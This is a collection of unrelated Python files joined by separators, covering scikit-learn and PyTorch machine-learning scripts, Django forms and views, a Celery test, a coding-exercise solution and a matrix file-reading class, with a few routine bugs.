x = np.asanyarray(images)
y = np.asanyarray(data[:,1], dtype=np.int)[:n_samples]
# xtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=0.1)
model = Pipeline([
#('scaler', StandardScaler()),
('pca', PCA(n_components=128)),
#('mlp', MLPClassifier(alpha=10, max_iter=50000))])
#('svm', svm.SVC(gamma=0.01))])
#("KNN", KNeighborsClassifier(1))])
#('DT', DecisionTreeClassifier(max_depth=50))])
("GP", GaussianProcessClassifier(1.0 * RBF(1.0)))])
model.fit(x, y)
print ("Train: ", model.score(x, y))
#*************************************************************
#Aqui los datos junto con su categoria (image_name, categoria)
data2 = pd.read_csv('oxford-102-flowers/train.txt', delimiter=' ',
header=None).values
xtest = []
n_samples2 = 200
for i in range(n_samples2):
img = io.imread('oxford-102-flowers/'+data2[i,0])/255
img = resize(img, (64,64))
#grey = np.sum(img, axis=2)/3
#sizes[i,0], sizes[i,1]= grey.shape[0], grey.shape[1]
xtest.append(img.ravel())
xtest = np.array(xtest)
ytest = np.asanyarray(data2[:,1], dtype=np.int)[:n_samples2]
print ("Test: ", model.score(xtest, ytest))
# ypred = model.predict(xtest)
# print ('Classification report: \n', metrics.classification_report(ytest, ypred))
# print ('Confusion matrix: \n', metrics.confusion_matrix(ytest, ypred))
# sample = np.random.randint(xtest.shape[0])
# plt.imshow(xtest[sample].reshape((28,28)), cmap=plt.cm.gray)
# plt.title('Prediccion: %i' % ypred[sample])
|
#!/users/jgrey/anaconda/bin/python
import sys
import time
import math
import cairo
import draw_routines
import logging
#constants
N = 12
X = pow(2,N)
Y = pow(2,N)
imgPath = "./imgs/"
imgName = "initialTest"
currentTime = time.gmtime()
FONT_SIZE = 0.03
#format the name of the image to be saved thusly:
saveString = "{}{}_{}-{}_{}-{}".format(imgPath,
imgName,
currentTime.tm_min,
currentTime.tm_hour,
currentTime.tm_mday,
currentTime.tm_mon,
currentTime.tm_year)
#get the type of drawing to do from the command line argument:
if len(sys.argv) > 1:
drawRoutineName = sys.argv[1]
else:
drawRoutineName = "circles"
#setup logging:
LOGLEVEL = logging.DEBUG
logFileName = "log.{}".format(drawRoutineName)
logging.basicConfig(filename=logFileName,level=LOGLEVEL,filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
#setup
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, X,Y)
ctx = cairo.Context(surface)
ctx.scale(X,Y)
ctx.set_font_size(FONT_SIZE)
#Drawing:
draw_routines.draw(ctx,drawRoutineName,X,Y,surface=surface,filenamebase=saveString)
|
from numpy import mean
from numpy import std
from sklearn.datasets import make_regression
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedKFold
from sklearn.linear_model import LinearRegression
from sklearn.neighbors import KNeighborsRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.svm import SVR
from sklearn.ensemble import StackingRegressor
from matplotlib import pyplot
# get the dataset
def get_dataset():
X, y = make_regression(n_samples=1000, n_features=20, n_informative=15, noise=0.1, random_state=1)
return X, y
# get a stacking ensemble of models
def get_stacking():
# define the base models
level0 = list()
level0.append(('knn', KNeighborsRegressor()))
level0.append(('cart', DecisionTreeRegressor()))
level0.append(('svm', SVR()))
# define meta learner model
level1 = LinearRegression()
# define the stacking ensemble
model = StackingRegressor(estimators=level0, final_estimator=level1, cv=5)
return model
# get a list of models to evaluate
def get_models():
models = dict()
models['knn'] = KNeighborsRegressor()
models['cart'] = DecisionTreeRegressor()
models['svm'] = SVR()
models['stacking'] = get_stacking()
return models
# evaluate a given model using cross-validation
def evaluate_model(model):
cv = RepeatedKFold(n_splits=10, n_repeats=3, random_state=1)
scores = cross_val_score(model, X, y, scoring='neg_mean_absolute_error', cv=cv, n_jobs=-1, error_score='raise')
return scores
if __name__ == '__main__':
# define dataset
X, y = get_dataset()
# get the models to evaluate
models = get_models()
# evaluate the models and store results
results, names = list(), list()
for name, model in models.items():
scores = evaluate_model(model)
results.append(scores)
names.append(name)
print('>%s %.3f (%.3f)' % (name, mean(scores), std(scores)))
# plot model performance for comparison
pyplot.boxplot(results, labels=names, showmeans=True)
pyplot.show() |
from datasetLoaders.DatasetInterface import DatasetInterface
import os
import random
import re
from typing import List, Tuple, Type
import numpy as np
import pandas as pd
import torch
from torch import Tensor, cuda
from pandas import DataFrame
# from cn.protect import Protect
# from cn.protect.privacy import KAnonymity
class DatasetLoader:
"""Parent class used for specifying the data loading workflow """
def getDatasets(self, percUsers: Tensor, labels: Tensor, size=(None, None)):
raise Exception(
"LoadData method should be override by child class, "
"specific to the loaded dataset strategy."
)
@staticmethod
def _filterDataByLabel(
labels: Tensor, trainDataframe: DataFrame, testDataframe: DataFrame
) -> Tuple[DataFrame, DataFrame]:
"""
Creates the train and test dataframes with only the labels specified
"""
trainDataframe = trainDataframe[trainDataframe["labels"].isin(labels.tolist())]
testDataframe = testDataframe[testDataframe["labels"].isin(labels.tolist())]
return trainDataframe, testDataframe
@staticmethod
def _splitTrainDataIntoClientDatasets(
percUsers: Tensor, trainDataframe: DataFrame, DatasetType: Type[DatasetInterface]
) -> List[DatasetInterface]:
"""
Splits train dataset into individual datasets for each client.
Uses percUsers to decide how much data (by %) each client should get.
"""
DatasetLoader._setRandomSeeds()
percUsers = percUsers / percUsers.sum()
dataSplitCount = (percUsers.cpu() * len(trainDataframe)).floor().numpy()
_, *dataSplitIndex = [
int(sum(dataSplitCount[range(i)])) for i in range(len(dataSplitCount))
]
# Sample and reset_index shuffles the dataset in-place and resets the index
trainDataframes: List[DataFrame] = np.split(
trainDataframe.sample(frac=1).reset_index(drop=True), indices_or_sections=dataSplitIndex
)
clientDatasets: List[DatasetInterface] = [
DatasetType(clientDataframe.reset_index(drop=True))
for clientDataframe in trainDataframes
]
return clientDatasets
@staticmethod
def _setRandomSeeds(seed=0) -> None:
os.environ["PYTHONHASHSEED"] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
cuda.manual_seed(seed)
# When anonymizing the clients' datasets using _anonymizeClientDatasets the function passed as
# parameter should take as parameter the cn.protect object and set ds specific generalisations
# @staticmethod
# def _anonymizeClientDatasets(
# clientDatasets, columns, k, quasiIds, setHierarchiesMethod
# ):
# datasetClass = clientDatasets[0].__class__
# resultDataframes = []
# clientSyntacticMappings = []
# dataframes = [
# DataFrame(list(ds.dataframe["data"]), columns=columns)
# for ds in clientDatasets
# ]
# for dataframe in dataframes:
# anonIndex = (
# dataframe.groupby(quasiIds)[dataframe.columns[0]].transform("size") >= k
# )
# anonDataframe = dataframe[anonIndex]
# needProtectDataframe = dataframe[~anonIndex]
# # Might want to ss those for the report:
# # print(anonDataframe)
# # print(needProtectDataframe)
# protect = Protect(needProtectDataframe, KAnonymity(k))
# protect.quality_model = quality.Loss()
# # protect.quality_model = quality.Classification()
# protect.suppression = 0
# for qid in quasiIds:
# protect.itypes[qid] = "quasi"
# setHierarchiesMethod(protect)
# protectedDataframe = protect.protect()
# mappings = protectedDataframe[quasiIds].drop_duplicates().to_dict("records")
# clientSyntacticMappings.append(mappings)
# protectedDataframe = pd.get_dummies(protectedDataframe)
# resultDataframe = (
# pd.concat([anonDataframe, protectedDataframe]).fillna(0).sort_index()
# )
# resultDataframes.append(resultDataframe)
# # All clients datasets should have same columns
# allColumns = set().union(*[df.columns.values for df in resultDataframes])
# for resultDataframe in resultDataframes:
# for col in allColumns - set(resultDataframe.columns.values):
# resultDataframe[col] = 0
# # Create new datasets by adding the labels to
# anonClientDatasets = []
# for resultDataframe, initialDataset in zip(resultDataframes, clientDatasets):
# labels = initialDataset.dataframe["labels"].values
# labeledDataframe = DataFrame(zip(resultDataframe.values, labels))
# labeledDataframe.columns = ["data", "labels"]
# anonClientDatasets.append(datasetClass(labeledDataframe))
# return anonClientDatasets, clientSyntacticMappings, allColumns
def _anonymizeTestDataset(
self, testDataset, clientSyntacticMappings, columns, generalizedColumns
):
datasetClass = testDataset.__class__
dataframe = DataFrame(list(testDataset.dataframe["data"]), columns=columns)
domainsSize = dict()
quasiIds = clientSyntacticMappings[0][0].keys()
for quasiId in quasiIds:
domainsSize[quasiId] = dataframe[quasiId].max() - dataframe[quasiId].min()
generalisedDataframe = DataFrame(dataframe)
ungeneralisedIndex = []
for i in range(len(dataframe)):
legitMappings = []
for clientMappings in clientSyntacticMappings:
legitMappings += [
mapping
for mapping in clientMappings
if self.__legitMapping(dataframe.iloc[i], mapping)
]
if legitMappings:
# leastGeneralMapping = reduce(self.__leastGeneral, legitMappings)
leastGeneralMapping = legitMappings[0]
for legitMapping in legitMappings[1:]:
leastGeneralMapping = self.__leastGeneral(
leastGeneralMapping, legitMapping, domainsSize
)
for col in leastGeneralMapping:
generalisedDataframe[col][i] = leastGeneralMapping[col]
else:
ungeneralisedIndex.append(i)
generalisedDataframe = generalisedDataframe.drop(i)
generalisedDataframe = pd.get_dummies(generalisedDataframe)
ungeneralisedDataframe = dataframe.iloc[ungeneralisedIndex]
resultDataframe = (
pd.concat([ungeneralisedDataframe, generalisedDataframe]).fillna(0).sort_index()
)
for col in generalizedColumns - set(resultDataframe.columns.values):
resultDataframe[col] = 0
labels = testDataset.dataframe["labels"].values
labeledDataframe = DataFrame(zip(resultDataframe.values, labels))
labeledDataframe.columns = ["data", "labels"]
return datasetClass(labeledDataframe)
@staticmethod
def __leastGeneral(map1, map2, domainSize):
map1Generality = map2Generality = 0
for col in map1:
if isinstance(map1[col], str):
interval = np.array(re.findall(r"\d+.\d+", map1[col]), dtype=np.float)
map1Generality += (interval[1] - interval[0]) / domainSize[col]
for col in map2:
if isinstance(map1[col], str):
interval = np.array(re.findall(r"\d+.\d+", map2[col]), dtype=np.float)
map2Generality += (interval[1] - interval[0]) / domainSize[col]
return map1 if map1Generality <= map2Generality else map2
@staticmethod
def __legitMapping(entry, mapping) -> bool:
for col in mapping:
if not isinstance(mapping[col], str):
if entry[col] != mapping[col]:
return False
else:
interval = np.array(re.findall(r"\d+.\d+", mapping[col]), dtype=np.float)
if interval[0] < entry[col] or entry[col] >= interval[1]:
return False
return True
|
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import PIL
from PIL import Image
import matplotlib.pyplot as plt
import torchvision.transforms as transforms
import torchvision.models as models
######### images
imsize = 200 # desired size of the output image
loader = transforms.Compose([
transforms.Scale(imsize), # scale imported image
transforms.ToTensor()]) # transform it into a torch tensor
def image_loader(image_name):
image = Image.open(image_name)
image = Variable(loader(image))
image = image.unsqueeze(0) # fake batch dimension required to fit network's input dimensions
return image
style = image_loader("images/picasso.jpg").cuda()
content = image_loader("images/dancing.jpg").cuda()
assert style.data.size() == content.data.size(), "we need to import style and content images of the same size"
########## display
unloader = transforms.ToPILImage() # reconvert into PIL image
def imshow(tensor):
image = tensor.clone().cpu() # we clone the tensor in order to not do changes on it
image.resize_(3,imsize,imsize) # remove the fake batch dimension
image = unloader(image)
plt.imshow(image)
fig = plt.figure()
plt.subplot(221)
imshow(style.data)
plt.subplot(222)
imshow(content.data)
########## content loss
class ContentLoss(nn.Module):
def __init__(self, target, weight):
super(ContentLoss, self).__init__()
self.target = target.detach() * weight # we 'detach' the target content from the tree used
# to dynamically compute the gradient: this is a stated value,
# not a variable. Otherwise the forward method of the criterion
# will throw an error.
self.weight = weight
self.criterion = nn.MSELoss()
def forward(self, input):
self.loss = self.criterion.forward(input*self.weight, self.target)
self.output = input
return self.output
def backward(self, retain_variables=True):
self.loss.backward(retain_variables=retain_variables)
return self.loss.data[0]
######### style loss
class GramMatrix(nn.Module):
def forward(self, input):
a,b,c,d = input.data.size() # a=batch size(=1)
# b=number of feature maps
# (c,d)=dimensions of a f. map (N=c*d)
input.data.resize_(a*b,c*d) # resise F_XL into \hat F_XL
G = torch.mm(input, input.t()) # compute the gram product
return G.div_(a*b*c*d) # we 'normalize' the values of the gram matrix
# by dividing by the number of element in each feature maps.
class StyleLoss(nn.Module):
def __init__(self, target, strength):
super(StyleLoss, self).__init__()
self.target = target.detach()*strength
self.strength = strength
self.gram = GramMatrix()
self.criterion = nn.MSELoss()
def forward(self, input):
self.output = input.clone()
self.G = self.gram.forward(input)
self.G.mul_(self.strength)
self.loss = self.criterion.forward(self.G, self.target)
return self.output
def backward(self, retain_variables=True):
self.loss.backward(retain_variables=retain_variables)
return self.loss.data[0]
####### load model
cnn = models.alexnet(pretrained=True).features.cuda()
# desired depth layers to compute style/content losses :
content_layers = ['conv_3','conv_4']
style_layers = ['conv_1','conv_2','conv_3','conv_4','conv_5']
# just in order to have an iterable access to or list of content/syle losses
content_losses = []
style_losses = []
art_net = nn.Sequential().cuda() # the new Sequential module network
gram = GramMatrix().cuda() # we need a gram module in order to compute style targets
# weigth associated with content and style losses
content_weight = 5
style_weight = 500
i = 1
for layer in list(cnn):
if isinstance(layer,nn.Conv2d):
name = "conv_"+str(i)
art_net.add_module(name,layer)
if name in content_layers:
# add content loss:
target = art_net.forward(content.cuda()).clone()
content_loss = ContentLoss(target, content_weight).cuda()
art_net.add_module("content_loss_"+str(i),content_loss)
content_losses.append(content_loss)
if name in style_layers:
# add style loss:
target_feature = art_net.forward(style.cuda()).clone()
target_feature_gram = gram.forward(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight).cuda()
art_net.add_module("style_loss_"+str(i),style_loss)
style_losses.append(style_loss)
if isinstance(layer,nn.ReLU):
name = "relu_"+str(i)
art_net.add_module(name,layer)
if name in content_layers:
# add content loss:
target = art_net.forward(content.cuda()).clone()
content_loss = ContentLoss(target, content_weight).cuda()
art_net.add_module("content_loss_"+str(i),content_loss)
content_losses.append(content_loss)
if name in style_layers:
# add style loss:
target_feature = art_net.forward(style.cuda()).clone()
target_feature_gram = gram.forward(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight).cuda()
art_net.add_module("style_loss_"+str(i),style_loss)
style_losses.append(style_loss)
i+=1
if isinstance(layer,nn.MaxPool2d):
name = "pool_"+str(i)
art_net.add_module(name,layer) # ***
print art_net
###### input image
input = image_loader("images/dancing.jpg").cuda()
# if we want to fill it with a white noise:
# input.data = torch.randn(input.data.size()).cuda()
# add the original input image to the figure:
plt.subplot(223)
imshow(input.data)
######## gradient descent
input = nn.Parameter(input.data) # this line to show that input is a parameter that requires a gradient
optimizer = optim.Adam([input], lr = 0.01)
for run in range(500):
# correct the values of updated input image
updated = input.data.cpu().clone()
updated = updated.numpy()
updated[updated<0] = 0
updated[updated>1] = 1
input.data = torch.from_numpy(updated).cuda()
optimizer.zero_grad()
art_net.forward(input)
style_score = 0
content_score = 0
for sl in style_losses:
style_score += sl.backward()
for cl in content_losses:
content_score += cl.backward()
optimizer.step()
if run%10==0:
print "run "+str(run)+":"
print style_score
print content_score
# a last correction...
result = input.data.cpu().clone()
result = result.numpy()
result[result<0] = 0
result[result>1] = 1
result = torch.from_numpy(result)
# finally enjoy the result:
plt.subplot(224)
imshow(input.data)
plt.show()
|
#This script tests the merra_dap module in WxMP
#Written by Christopher Phillips
#Import required modules
from wxmp import merra_dap as wm
import matplotlib.pyplot as pp
from datetime import datetime as dt
#Create test dates
start_date = dt.strptime("20160618", "%Y%m%d")
end_date = dt.strptime("20160621", "%Y%m%d")
#Password and username to NASA GESDISC ESODIS server
username = "your_username"
password = "your_password"
#Create merra analysis object
merra = wm.MERANL(username, password, start_date, end_date, "atmosphere")
#Print dates
print("Dates loaded: {}".format(merra.dates))
#Print number of datasets
print("Number of dates loaded: {}".format(len(merra.dataset)))
#Print grid shape
print("Shape of grid: {}".format(merra.lats.shape))
#Get the indices of a point
point = (47, -17)
x, y = merra.get_point(point)
print("Extent of domain: {}".format(merra.extent))
print("Point being tested: {}".format(point))
print("Indices of point: {}, {}".format(x, y))
print("Found point: {}, {}".format(merra.lons[y,x], merra.lats[y,x]))
#Set the new extent
region = [-60, -40, -10, 20]
merra.set_anl_region(region)
#Print regional lon/lats
print("New region: {}".format(region))
print("Regional Lons and Lats")
print(merra.rlons)
print(merra.rlats)
#Print variable list
print("Variable list: {}".format(merra.variables))
#Grab a variable
var = merra.get_var(merra.variables[0])
print("All time var shape: {}".format(var.shape))
#Now grab a variable for a specific time
var = merra.get_var(merra.variables[0], filedate=dt.strptime("2016060708", "%Y%m%d%H"))
print("Single time var shape: {}".format(var.shape))
#Plot a quick map
fig, ax = pp.subplots(subplot_kw={"projection":merra.pcp})
ax.contourf(merra.rlons, merra.rlats, var)
ax.coastlines()
cb = fig.colorbar(cont=cont, orientation="horizontal")
cb.set_label(merra.variables, fontsize=14, fontweight="bold")
pp.show()
print("TEST SUCCESSFUL")
|
from banking import *
def pay_annual_interest(accounts):
for acc in accounts:
if isinstance(acc, Profitable):
amt = acc.interest(1)
acc.deposit(amt)
jack = CurrentAccount()
jack.deposit(15000)
jill = SavingsAccount()
jill.deposit(10000)
try:
payment = float(input('Amount to pay: '))
if payment > 0:
jill.transfer(payment, jack)
print('Payment succeeded.')
except InsufficientFunds:
print('Payment failed due to lack of funds!')
except Exception as ex:
print('Error -', ex)
bank = {'Jack': jack, 'Jill': jill}
pay_annual_interest(bank.values())
for cust, acc in bank.items():
print(f"{cust}'s balance is {acc.balance()}")
|
# -*- coding: utf-8 -*-
"""
Messaging module
"""
if deployment_settings.has_module("msg"):
# =============================================================================
# Tasks to be callable async
# =============================================================================
def process_outbox(contact_method, user_id=None):
"""
Process Outbox
- will normally be done Asynchronously if there is a worker alive
@param contact_method: one from s3msg.MSG_CONTACT_OPTS
@param user_id: calling request's auth.user.id or None
"""
if user_id:
# Authenticate
auth.s3_impersonate(user_id)
# Run the Task
result = msg.process_outbox(contact_method)
return result
tasks["process_outbox"] = process_outbox
# END =========================================================================
|
from selenium import webdriver
import math
def calc(x):
return str(math.log(abs(12*math.sin(int(x)))))
browser = webdriver.Chrome()
link = "http://suninjuly.github.io/get_attribute.html"
browser.get(link)
x_element = browser.find_element_by_id("treasure")
x = x_element.get_attribute("valuex")
y = calc(x)
input = browser.find_element_by_id("answer")
input.send_keys(y)
checkbox1 = browser.find_element_by_id("robotCheckbox")
checkbox1.click()
radio1 = browser.find_element_by_id("robotsRule")
radio1.click()
button = browser.find_element_by_class_name("btn.btn-default")
button.click()
|
# coding=utf-8
from captcha.fields import CaptchaField
from django import forms
from django.contrib.auth.models import User
from registration.forms import RegistrationForm
from models import Object, Observation, ImagingDevice, FITSFile
class UploadFileForm(forms.Form):
""" This form represents a basic request from Fine Uploader.
The required fields will **always** be sent, the other fields are optional
based on your setup.
"""
qqfile = forms.FileField()
qquuid = forms.CharField()
qqfilename = forms.CharField()
qqpartindex = forms.IntegerField(required=False)
qqchunksize = forms.IntegerField(required=False)
qqpartbyteoffset = forms.IntegerField(required=False)
qqtotalfilesize = forms.IntegerField(required=False)
qqtotalparts = forms.IntegerField(required=False)
class ObjectForm(forms.ModelForm):
"""
A form for adding an object or modifying an existing one
"""
class Meta:
model = Object
fields = ('number', 'name', 'ra', 'dec', 'cal_offset')
labels = {'number': 'Unique object number', 'ra': 'Right Ascension (J2000) (HH MM SS)', 'dec':
'Declination (J2000) ([±]Deg ArcMin ArcSec)', 'cal_offset': 'Calibration offset'}
class ObservationForm(forms.ModelForm):
"""
A form for adding a new observation or modifying an existing one
"""
class Meta:
model = Observation
fields = ('target', 'device')
labels = {'target': 'Target of observation', 'device': 'Device used'}
class MetadataForm(forms.Form):
"""
A form to add missing information to the FITS header
"""
DATE_FORMAT_CHOICES = (
('JD', 'Julian Date'),
('MJD', 'Modified Julian Date'),
('DATETIME', 'Date and Time (Same Field)'),
('DATETIMESEP', 'Date and Time (Seperate Fields)')
)
date_format = forms.ChoiceField(choices=DATE_FORMAT_CHOICES)
date = forms.CharField(max_length=255, label="Date of observation")
time = forms.CharField(max_length=255, label="Time of observation", required=False)
exptime = forms.FloatField(label="Exposure time (s)")
filter = forms.CharField(max_length=255, label="Filter")
class MetadataKeyChoiceForm(forms.Form):
DATE_FORMAT_CHOICES = (
('JD', 'Julian Date'),
('MJD', 'Modified Julian Date'),
('DATETIME', 'Date and Time (Same Field)'),
('DATETIMESEP', 'Date and Time (Seperate Fields)')
)
date_format = forms.ChoiceField(choices=DATE_FORMAT_CHOICES)
date = forms.ChoiceField()
time = forms.ChoiceField()
filter = forms.ChoiceField()
exposure_time = forms.ChoiceField()
class ImagingDeviceForm(forms.ModelForm):
"""
Form to add a new imaging device or to modify an existing one
"""
class Meta:
model = ImagingDevice
fields = ('name', 'scale', 'mirror_diameter', 'description')
labels = {'name': 'Name of your device', 'scale': 'Pixel scale (arcseconds)',
'mirror_diameter': 'Main Mirror / Objective Lens diameter (m)'}
widgets = {'description': forms.Textarea}
class RedoCalibrationForm(forms.Form):
"""
Form for users to re-do the calibration with their own max and min values
"""
max_use = forms.FloatField(initial=0)
min_use = forms.FloatField(initial=0)
class CAPTCHARegistrationForm(RegistrationForm):
"""
Custom registration form including a CAPTCHA
"""
captcha = CaptchaField()
class ChooseUserForm(forms.Form):
"""
Form to choose a user from a dropdown list
"""
user = forms.ModelChoiceField(queryset=User.objects.all().order_by('username'))
class ChooseStatusForm(forms.Form):
"""
Form to choose a status from a dropdown list
"""
status = forms.ChoiceField(choices=FITSFile.STATUS_CHOICES)
class RADecForm(forms.Form):
"""
Form to enter an Right Ascension and Declination
"""
ra = forms.CharField(label="RA")
dec = forms.CharField(label="Dec")
class LightcurveSearchForm(forms.Form):
"""
Form to enter data for a lightcurve search
"""
user_input = forms.CharField(label="Input")
input_type = forms.ChoiceField(label="Type of input", choices=(
('NAME', 'Name'),
('COORD', 'Co-ordinates'),
), initial='COORD', widget=forms.RadioSelect)
units = forms.ChoiceField(label="Units", choices=(
('DD', 'Degrees Degrees'),
('HD', 'Hours Degrees')
), required=False, widget=forms.RadioSelect)
coordinate_frame = forms.ChoiceField(label="Co-ordinate frame", choices=(
('fk5', 'FK5'),
('icrs', 'ICRS'),
('fk4', 'FK4'),
('galactic', 'Galactic')
), required=False, initial='fk5')
radius = forms.CharField(label="Radius (arcsec)", required=False, initial=10)
|
from django.shortcuts import render,get_object_or_404,redirect
from .models import Blog
from django.utils import timezone
from .forms import BlogForm
from django.core.paginator import Paginator
# Create your views here.
def home(request):
blogs=Blog.objects.all()
search = request.GET.get('search')
if search == 'true':
author = request.GET.get('writer')
blogs = Blog.objects.filter(writer=author)
paginator = Paginator(blogs, 3)
page=request.GET.get('page')
blogs = paginator.get_page(page)
return render(request,'home.html',{'blogs':blogs})
def detail(request,id):
blog = get_object_or_404(Blog,pk=id)
return render(request,'detail.html',{'blog':blog})
def new(request):
form = BlogForm()
return render(request,'new.html',{'form':form})
def create(request):
form = BlogForm(request.POST,request.FILES)
if form.is_valid():
new_blog=form.save(commit=False)
new_blog.pub_date = timezone.now()
new_blog.save()
return redirect('detail',new_blog.id)
return redirect('home')
def edit(request,id):
edit_blog=Blog.objects.get(id=id)
return render(request,'edit.html',{'blog':edit_blog})
def update(request,id):
update_blog=Blog.objects.get(id=id)
update_blog.title=request.POST['title']
update_blog.writer=request.POST['writer']
update_blog.body=request.POST['body']
update_blog.pub_date=timezone.now()
update_blog.save()
return redirect('detail',update_blog.id)
def delete(request,id):
delete_blog=Blog.objects.get(id=id)
delete_blog.delete()
return redirect('home')
|
"""Test cases for the module that uses a cookbook programming style"""
# TODO: Add correct import statements
# TODO: Add test cases to adequately cover the program
# TODO: Run test coverage monitoring and reporting with pytest-cov
def test_read_file_populates_data_0():
"""Checks that reading the file populates global data variable"""
# pylint: disable=len-as-condition
assert len(compute_tf_cookbook.data) == 0
compute_tf_cookbook.read_file("inputs/input.txt")
assert len(compute_tf_cookbook.data) != 0
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'getTotalX' function below.
#
# The function is expected to return an INTEGER.
# The function accepts following parameters:
# 1. INTEGER_ARRAY a
# 2. INTEGER_ARRAY b
#
def getTotalX(a, b):
temp = 0
contador = 1
numero_maior = max(b)
numero_menor = min(b)
set1, set2 = [], []
final = []
while contador <= numero_menor:
for elem in a:
if contador % elem == 0:
temp = contador
else:
temp = 0
break
if temp != 0:
set1.append(temp)
contador += 1
temp = 0
temp = 0
for elems in set1:
for elemb in b:
if elemb % elems == 0:
temp = elems
else:
temp = 0
break
if temp!= 0:
set2.append(temp)
set1, set2 = set(set1), set(set2)
final = set1.intersection(set2)
return(len(final))
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
n = int(first_multiple_input[0])
m = int(first_multiple_input[1])
arr = list(map(int, input().rstrip().split()))
brr = list(map(int, input().rstrip().split()))
total = getTotalX(arr, brr)
fptr.write(str(total) + '\n')
fptr.close()
|
from django.db import models
# Create your models here.
class pfc(models.Model):
Year_to_be_forward = models.IntegerField(default=2017)
# For_the_year = models.IntegerField()
|
import argparse
args = argparse.ArgumentParser(description='MolGAN model for molecular.')
args.add_argument('--device', default=1)
args.add_argument("--mode", default="train", help='mode for model, default is true')
args.add_argument('--learning_rate', default=1e-3, help='learning rate')
args.add_argument('--batch_dim', default=128, help='size of a batch')
args.add_argument('--la', default=1.0, type=float)
args.add_argument('--dropout_rate', default=0.)
args.add_argument('--z_dim', default=8, type=int, help='the sample dim')
args.add_argument('--epochs', default=10, type=int)
args.add_argument('--temperature', default=1.0, type=float)
args.add_argument('--n_critic', default=5, type=int, help='the ratio of train discriminator and generator' )
# parser = argparse.ArgumentParser(description='Process some integers.')
args.add_argument('--dataset', default='../data/', help='the data path')
# args.add_argument('--model', default='wavelet_gcn', help='model name')
args.add_argument('--max_atom_num', default=29)
args = args.parse_args()
print(args)
# batch_dim = 128
# la = 1
# dropout = 0
# n_critic = 5
# metric = 'validity,sas'
# n_samples = 5000
# z_dim = 8
# epochs = 10
# save_every = 1 # May lead to errors if left as None
|
from django.test import TestCase
import models as md
# class ApiViewTest(TestCase):
# def test_validate_user(self):
# response = self.
|
import socket
import unittest2 as unittest
from celery.task.builtins import PingTask
from celery.utils import gen_unique_id
from celery.worker import control
from celery.worker.revoke import revoked
from celery.registry import tasks
hostname = socket.gethostname()
class TestControlPanel(unittest.TestCase):
def setUp(self):
self.panel = control.ControlDispatch(hostname=hostname)
def test_shutdown(self):
self.assertRaises(SystemExit, self.panel.execute, "shutdown")
def test_dump_tasks(self):
self.panel.execute("dump_tasks")
def test_rate_limit(self):
task = tasks[PingTask.name]
old_rate_limit = task.rate_limit
try:
self.panel.execute("rate_limit", kwargs=dict(
task_name=task.name,
rate_limit="100/m"))
self.assertEqual(task.rate_limit, "100/m")
self.panel.execute("rate_limit", kwargs=dict(
task_name=task.name,
rate_limit=0))
self.assertEqual(task.rate_limit, 0)
finally:
task.rate_limit = old_rate_limit
def test_rate_limit_nonexistant_task(self):
self.panel.execute("rate_limit", kwargs={
"task_name": "xxxx.does.not.exist",
"rate_limit": "1000/s"})
def test_unexposed_command(self):
self.panel.execute("foo", kwargs={})
def test_revoke(self):
uuid = gen_unique_id()
m = {"command": "revoke",
"destination": hostname,
"task_id": uuid}
self.panel.dispatch_from_message(m)
self.assertIn(uuid, revoked)
m = {"command": "revoke",
"destination": "does.not.exist",
"task_id": uuid + "xxx"}
self.panel.dispatch_from_message(m)
self.assertNotIn(uuid + "xxx", revoked)
|
import json
import re
class Matrix:
def __init__(self):
self.matrix = []
self.input_list = []
def rows(self):
return len(self.matrix)
def colums(self):
if self.row() == 0:
return 0
return len(self.matrix[0])
# ------------------- read matrix from stdin ---------------------------
def create_matrix_from_stdin(self, rows, cols):
row_list = []
item = 0
for i in range(rows):
for j in range(cols):
item = input(f"input item[{i}][{j}]: ")
if item:
try:
item = float(item)
row_list.append(item)
except ValueError:
print('All values must be numeric ')
exit()
else:
print("input is empty")
exit()
self.matrix.append(row_list)
row_list = []
return self.matrix
def create_3d_matrix_from_stdin(self):
rows = input("input number of rows: ")
cols = input("input number of colums: ")
layer = input('input number of layers: ')
matrix_3d = []
if rows and cols and layer:
try:
rows = int(rows)
cols = int(cols)
layer = int(layer)
except ValueError:
print('Number of rows and number of columns mast be numeric')
exit()
else:
print('There is empty imput')
exit()
for n in range(layer):
print(f'layer {n+1}')
matrix_3d.append(self.create_matrix_from_stdin(rows, cols))
self.matrix = []
self.matrix = matrix_3d
return self.matrix
# ----------------- read from file -----------------------------------
def read_from_file(self, file_name):
file_extension = file_name.split('.')[-1]
if file_extension == 'txt':
return self.read_txt(file_name)
elif file_extension == 'json':
return self.read_json(file_name)
else:
print('Enter the name of the json or txt file with its extension.'
' Ex. filename.txt, filename.json')
exit()
# ----------------file content format check ----------------
def check_file_content(self, file_name):
matrix = []
with open(file_name) as f:
text = f.readlines()
for i in text:
i = i.strip('\n')
try:
i = re.findall(r'-?\d+', i)
matrix.append(float(i[0]))
except IndexError:
print('All values must be numeric')
exit()
if len(matrix[3::]) != matrix[0] * matrix[1] * matrix[2]:
print('wrong number of items')
exit()
return matrix
# ------------ read from txt -------------------------
def read_txt(self, file_name):
text = self.check_file_content(file_name)
layer = int(text[0])
row = int(text[1])
col = int(text[2])
row_list = []
col_list = []
for i in range(len(text[3::])):
col_list.append(text[i+ 3])
if len(col_list) == col:
row_list.append(col_list)
col_list = []
if len(row_list) == row:
self.matrix.append(row_list)
row_list = []
layer -= 1
if layer == 0:
return self.matrix
# ------------- read from json ------------------------
def read_json(self, file_name):
try:
with open(file_name, 'r+') as f:
self.matrix = json.load(f)
except FileNotFoundError:
print('File not found. Enter the full path or check spelling.')
exit()
return self.matrix
# ---------------------- write to file --------------------------
def write_to_file(self, file_name, text):
self.final_text = ''
file_extension = file_name.split('.')[-1]
if file_extension == 'txt':
return self.write_text(file_name, text)
elif file_extension == 'json':
return self.write_json(file_name, text)
# -------- write to text file ----------------
def write_text(self, file_name, matrix):
layer = len(matrix)
